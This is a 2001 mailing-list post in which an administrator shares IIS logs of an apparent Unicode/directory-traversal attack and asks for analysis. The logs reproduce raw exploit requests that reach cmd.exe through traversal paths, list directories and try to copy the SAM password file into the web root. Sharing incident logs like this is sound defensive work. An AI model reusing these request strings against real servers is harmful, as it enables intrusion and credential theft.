Security Incidents mailing list archives

IIS Unicode attack decode

From: ROBERT DEMAIN <rdemain () RM COM>
Date: Tue, 20 Mar 2001 14:56:22 -0000
Hello All,

Recently i've been seeing quite a few attempts from the same russian IP
trying to send unicode commands to a web server.  These attacks were picked
up by an IDS.  Below are extracts from the log file on the web server (see
below)

My understanding of what has happened here is as follows:
-attacker tries a few attempts at doing a dir listing of c: and d:
-attacker tries to copy important stuff from the \repair directory to
c:\inetpub\wwwroot (most unfriendly)
-attacker tries to copy bitmap (Blue%20Lace%2016.bmp) - not sure what this
is about

Putting it all together it seems the attacker tried to use the iis4 and 5
unicode exploit to copy the sam file to a place where he/she/it thought they
could get it from (on this server c:\inetpub\wwwroot is not the default web
site or anything, but i believe it is on a default iis install).  This
failed for two main reasons; 1. the iusr_servername account (which is the
user account this exploit can run as - correct me if i'm wrong) does not
have permissions on \repair 2. the copy of the file to c:\inetpub\wwwroot
would also fail as iusr_servername would not have the rights.

Anyone have any comments on this?  Anyone else seen activity like this?

Regards

Rob


2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD /Default.htm -
200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200
Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/cgi-shl/win-c-sample.exe - 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200
Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
/scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
/scripts/\/winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../winnt/system32/cmd.exe /c+dir+d:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
/scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:14 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:23:31 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:23:56 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+dir+d:\SOMETHINGOTDOWITHME%20WEB%20HOSTING 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:10 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:15 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:42 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\repair\
200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:26:45 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:10 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:27 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:37 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:59 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:29:13 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+dir+c:\Inetpub\AdminScripts\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:29:31 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+dir+c:\Inetpub\wwwroot\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)


Standard Disclaimer: This message is confidential.  You should not copy it
or disclose its contents to anyone.  You may use and apply the information
only for the intended purpose.  Internet communications are not secure and
therefore RM does not accept legal responsibility for the contents of this
message.  Any views or opinions presented are only those of the author and
not those of RM.  If this email has come to you in error please delete it
and any attachments.  Please note that RM may intercept incoming and
outgoing e-mail communications.
Current thread:

IIS Unicode attack decode ROBERT DEMAIN (Mar 20)
- Re: IIS Unicode attack decode Derek Kwan (Mar 20)
- <Possible follow-ups>
- Re: IIS Unicode attack decode Portnoy, Gary (Mar 20)
- Re: IIS Unicode attack decode ROBERT DEMAIN (Mar 20)